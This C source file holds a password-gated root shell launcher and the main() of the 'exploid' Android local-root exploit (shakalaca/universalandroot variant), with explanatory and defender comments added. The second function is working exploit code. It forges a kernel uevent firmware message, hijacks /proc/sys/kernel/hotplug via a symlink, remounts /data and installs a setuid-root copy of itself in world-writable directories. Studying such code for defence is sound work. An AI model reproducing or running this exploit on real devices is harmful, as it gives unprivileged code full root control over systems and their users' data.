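/*
 * Password gate in front of rootshell().
 *
 * Loads the expected password from password.txt (when the file has several
 * lines the last one wins, as before), reads one whitespace-delimited
 * attempt from stdin and calls rootshell() only when both strings are equal.
 *
 * Fixes over the previous version:
 *  - the file line is length-checked before it is stored, instead of an
 *    unbounded strcpy() into a 100-byte stack buffer;
 *  - the attempt is read with a field width, instead of an unbounded "%s";
 *  - an empty or unreadable password file fails closed instead of comparing
 *    against an uninitialised buffer (and indexing real_pass[-1]);
 *  - a failed read of the attempt is rejected, so an empty attempt can never
 *    equal an empty stored password;
 *  - the heap buffer from getline() is gone, so nothing is leaked;
 *  - `return;` in a function returning int is replaced by a real status.
 *
 * Returns 1 when the password cannot be loaded, 0 otherwise.
 *
 * NOTE(review): the password is kept in plaintext in password.txt and is
 * compared with strcmp(), which is not constant-time. Storing a salted
 * password hash and restricting the file's permissions would be the next
 * step; neither is done here to keep the file format unchanged.
 */
int main(){
    char real_pass[100] = "";
    char user_pass[100] = "";
    /* One byte larger than real_pass so that a 99-character password
     * followed by '\n' still fits in a single fgets() call. */
    char line[sizeof real_pass + 1];
    int have_pass = 0;

    /* get root password from file */
    FILE *source = fopen("password.txt", "r");
    if (source == NULL) {
        perror("fopen");
        printf("Unable to read password.txt!");
        return 1;
    }

    while (fgets(line, sizeof line, source) != NULL) {
        size_t n = strlen(line);

        if (n > 0 && line[n - 1] == '\n') {
            line[--n] = '\0';
        }
        /* Anything that does not fit real_pass (including the first chunk
         * of an over-long line) is refused rather than truncated. */
        if (n >= sizeof real_pass) {
            fclose(source);
            printf("Unable to read password.txt!");
            return 1;
        }
        memcpy(real_pass, line, n + 1);
        have_pass = 1;
    }
    fclose(source);

    if (!have_pass) {
        /* Empty file: there is no password to compare against. */
        printf("Unable to read password.txt!");
        return 1;
    }

    /* get user's attempt
     *
     * The read call is masked in the published listing ("******"); the
     * surviving `"%s", user_pass` arguments indicate a scanf(), restored
     * here with a width of sizeof user_pass - 1. */
    printf("enter root password: ");
    fflush(stdout);
    if (scanf("%99s", user_pass) != 1) {
        printf("incorrect password");
        return 0;
    }

    if (strcmp(real_pass, user_pass) == 0) {
        printf("here comes a shell!\n");
        rootshell();
    } else {
        printf("incorrect password");
    }
    return 0;
}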
/*
 * Entry point of the "exploid" Android local-root tool, in the variant that
 * carries the shakalaca markers and the package path
 * com.corner23.android.universalandroot (both taken from the strings below).
 *
 * The same binary takes one of three paths, chosen by its credentials:
 *   1. euid 0 and real uid non-zero: calls rootshell(env, argv).
 *   2. euid 0 otherwise: calls clear_hotplug(), copies its own executable to
 *      a fixed location, marks the copy mode 04711 (setuid) and exits.
 *      Presumably this is the path taken when the staged file is run as a
 *      hotplug helper; that is inferred from the file names, not shown here.
 *   3. unprivileged: picks a working directory, writes helper files there,
 *      creates a symlink to /proc/sys/kernel/hotplug and sends one message
 *      on a NETLINK_KOBJECT_UEVENT socket.
 *
 * Defender notes (artefacts created by the visible code):
 *   - files named "rootshell" with mode 04711 under /sqlite_stmt_journals,
 *     /app-cache or /data/local/tmp;
 *   - files "hotplug", "loading", "mount", "fs_type" and a symlink "data"
 *     pointing at /proc/sys/kernel/hotplug in one of the working
 *     directories listed below;
 *   - a remount of /data using parameters read back from "mount"/"fs_type".
 *   A setuid file in a world-writable directory, or an unexpected value in
 *   /proc/sys/kernel/hotplug, is worth alerting on. The message in path 3
 *   comes from an unprivileged user-space sender; presumably a receiver
 *   that checks the origin of uevent messages discards it (verify against
 *   the platform's uevent handling).
 *
 * rootshell(), clear_hotplug(), copy() and die() are defined elsewhere;
 * argc and buf2 are not used in the visible code.
 *
 * Returns 0 after sending the message; path 2 ends with exit(1).
 */
int main(int argc, char **argv, char **env) {
    char buf[512], path[512], buf2[512];
    int ofd, ifd;
    struct sockaddr_nl snl;
    /* The message payload is the whole of buf: the iovec covers all
     * sizeof(buf) bytes, not only the formatted part. */
    struct iovec iov = {buf, sizeof(buf)};
    struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};
    int sock;
    char *basedir = NULL;
    int len;
    char path_fix[512];

    /* shakalaca: check if this program is called from UI or from CLI { */
    /* pwd receives the link target of stdin; it is compared with the
     * "/dev/pts/" prefix further down. The readlink() result is not checked,
     * so pwd stays all-zero when the call fails. */
    char pwd[128];
    memset(pwd, 0, sizeof(pwd));
    readlink("/proc/self/fd/0", pwd, sizeof(pwd));
    /* shakalaca: check if this program is called from UI or from CLI } */

    /* I hope there is no LD_ bug in androids rtld :) */
    /* Path 1: effective root but a non-root real uid, i.e. the process got
     * its privileges from the setuid bit. Whether rootshell() returns is not
     * visible here. */
    if (geteuid() == 0 && getuid() != 0)
        rootshell(env, argv);

    /* Resolve the path of the running executable; it is written to the
     * "hotplug" file and used as the copy source below. */
    memset(path, 0, sizeof(path));
    if (readlink("/proc/self/exe", path, sizeof(path)) < 0)
        die("[-] readlink");
    len = strlen(path);
    /* Drops one trailing byte when it compares greater than 127. */
    if (path[len - 1] > 127) {
        len--;
    }

    /* Path 2: running with euid 0 (and, given the check above, normally with
     * real uid 0 as well). */
    if (geteuid() == 0) {
        char mp[128], fstype[16];

        clear_hotplug();

        /* path_fix is path cut to len bytes and explicitly terminated. */
        strncpy(path_fix, path, len);
        path_fix[len] = '\0';

        /* remount /system rw */
        /* shakalaca: read mount settings from file { */
        /*
        if (mount("/dev/mtdblock0", "/system", "yaffs2", MS_REMOUNT, 0) < 0)
            mount("/dev/mtdblock0", "/system", "yaffs", MS_REMOUNT, 0);
        */

        /* test /sqlite_stmt_journals first */
        if ((ofd = creat("/sqlite_stmt_journals/test", 0644)) < 0) {
            /* failed, try /app-cache or /data/local/tmp.
               either way should mount /data first, in case failed */
            /* shakalaca: check mount file and change to right directory */
            /* Looks for the "mount" file written by path 3 in each candidate
             * directory and changes into the first one that has it. */
            if ((ifd = open("/sqlite_stmt_journals/mount", O_RDONLY)) < 0) {
                if ((ifd = open("/data/local/tmp/mount", O_RDONLY)) < 0) {
                    if ((ifd = open("/data/data/com.corner23.android.universalandroot/files/mount", O_RDONLY)) < 0) {
                        die("[-] missing required files..");
                    } else {
                        close(ifd);
                        chdir("data/data/com.corner23.android.universalandroot/files/");
                    }
                } else {
                    close(ifd);
                    chdir("/data/local/tmp");
                }
            } else {
                close(ifd);
                chdir("/sqlite_stmt_journals");
            }

            /* Read back the device and filesystem type stored by path 3
             * (argv[1] and argv[2] of that run). The buffers are filled by
             * read() and not terminated here. */
            if ((ifd = open("mount", O_RDONLY)) < 0)
                die("[-] open mount point");
            if (read(ifd, mp, sizeof(mp)) < 0)
                die("[-] read mount point");
            close(ifd);

            if ((ifd = open("fs_type", O_RDONLY)) < 0)
                die("[-] open fs type");
            if (read(ifd, fstype, sizeof(fstype)) < 0)
                die("[-] read fs type");
            close(ifd);

            /* Remount /data with those parameters; the result is ignored. */
            mount(mp, "/data", fstype, MS_REMOUNT, 0);
            /* shakalaca: read mount settings from file } */

            /* Install the copy in /app-cache when it is writable, otherwise
             * in /data/local/tmp. 04711 = setuid bit, rwx for the owner,
             * execute-only for group and others. */
            if ((ofd = creat("/app-cache/test", 0644)) < 0) {
                copy(path_fix, "/data/local/tmp/rootshell");
                chmod("/data/local/tmp/rootshell", 04711);
            } else {
                close(ofd);
                unlink("/app-cache/test");
                if (copy(path_fix, "/app-cache/rootshell") < 0) {
                    copy(path_fix, "/data/local/tmp/rootshell");
                    chmod("/data/local/tmp/rootshell", 04711);
                } else {
                    chmod("/app-cache/rootshell", 04711);
                }
            }
        } else {
            /* /sqlite_stmt_journals is writable: remove the probe file and
             * install the setuid copy there. */
            close(ofd);
            unlink("/sqlite_stmt_journals/test");
            copy(path_fix, "/sqlite_stmt_journals/rootshell");
            chmod("/sqlite_stmt_journals/rootshell", 04711);
        }

        /* shakalaca: do not loop forever, it will eat cpu resource { */
        /* for (;;); */
        exit(1);
        /* shakalaca: do not loop forever, it will eat cpu resource } */
    }

    /* Path 3: unprivileged run. */
    printf("[*] Android local root exploid (C) The Android Exploid Crew\n");
    printf("[*] Modified by shakalaca for various devices\n");

    /*
    basedir = "/sqlite_stmt_journals";
    if (chdir(basedir) < 0) {
        basedir = "/data/local/tmp";
        if (chdir(basedir) < 0)
            basedir = strdup(getcwd(buf, sizeof(buf)));
    }
    */

    /* Working-directory selection: /sqlite_stmt_journals first, then
     * /data/local/tmp if a probe file can be created there, then the app's
     * files directory when stdin is not a pseudo-terminal, else the
     * directory the process started in. */
    basedir = "/sqlite_stmt_journals";
    if (chdir(basedir) < 0) {
        basedir = strdup(getcwd(buf, sizeof(buf)));
        if (chdir("/data/local/tmp") < 0) {
            /* Use from Android UI, fall back to project directory */
            if (strncmp(pwd, "/dev/pts/", 9) != 0) {
                basedir = "/data/data/com.corner23.android.universalandroot/files";
                if (chdir(basedir) < 0)
                    die("[-] chdir");
            }
        } else {
            /* test if it's writable */
            if ((ofd = creat("test", 0644)) < 0) {
                if (strncmp(pwd, "/dev/pts/", 9) != 0) {
                    /* Use from Android UI, fall back to project directory */
                    basedir = "/data/data/com.corner23.android.universalandroot/files";
                }
                if (chdir(basedir) < 0)
                    die("[-] chdir");
            } else {
                basedir = "/data/local/tmp";
                unlink("test");
            }
            /* Also reached with ofd < 0 when creat() failed above. */
            close(ofd);
        }
    }

    printf("[+] Using basedir=%s, path=%s\n", basedir, path);
    printf("[+] opening NETLINK_KOBJECT_UEVENT socket\n");

    /* shakalaca: remove old data if possible { */
    unlink("data");
    unlink("hotplug");
    unlink("loading");
    unlink("mount");
    unlink("fs_type");
    /* shakalaca: remove old data if possible } */

    /* Destination address of the message: netlink port id 1. */
    memset(&snl, 0, sizeof(snl));
    snl.nl_pid = 1;
    snl.nl_family = AF_NETLINK;

    if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0)
        die("[-] socket");

    /* Staged files, all relative to the working directory chosen above:
     * an empty "loading" file and "hotplug", which holds the first len
     * bytes of this executable's path. */
    close(creat("loading", 0666));

    if ((ofd = creat("hotplug", 0644)) < 0)
        die("[-] creat");
    if (write(ofd, path, len) < 0)
        die("[-] write");
    close(ofd);

    /* shakalaca: for remember mount device and filesystem type of /system { */
    /* argv[1] and argv[2] are stored verbatim for path 2 to read back; argc
     * is not consulted before they are dereferenced. */
    if ((ofd = creat("mount", 0644)) < 0)
        die("[-] creat mount point");
    if (write(ofd, argv[1], strlen(argv[1])) < 0)
        die("[-] write mount point");
    close(ofd);

    if ((ofd = creat("fs_type", 0644)) < 0)
        die("[-] creat fs type");
    if (write(ofd, argv[2], strlen(argv[2])) < 0)
        die("[-] write fs type");
    close(ofd);
    /* shakalaca: for remember mount device and filesystem type of /system } */

    /* "data" becomes a symlink to the kernel's hotplug-helper setting. */
    symlink("/proc/sys/kernel/hotplug", "data");

    /* Build the message: four KEY=value fields, each terminated by a NUL
     * byte (the %c arguments are 0). DEVPATH and FIRMWARE both embed
     * basedir behind "../" components. */
    snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"
             "SUBSYSTEM=firmware%c"
             "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0);

    printf("[+] sending add message ...\n");
    if (sendmsg(sock, &msg, 0) < 0)
        die("[-] sendmsg");
    close(sock);

    /* NOTE(review): the text names /system/bin/rootshell, while the visible
     * code in path 2 installs the copy under /sqlite_stmt_journals,
     * /app-cache or /data/local/tmp. */
    printf("[*] Try to invoke hotplug now, clicking at the wireless\n"
           "[*] settings, plugin USB key etc.\n"
           "[*] You succeeded if you find /system/bin/rootshell.\n"
           "[*] GUI might hang/restart meanwhile so be patient.\n");
    sleep(1);

    return 0;
}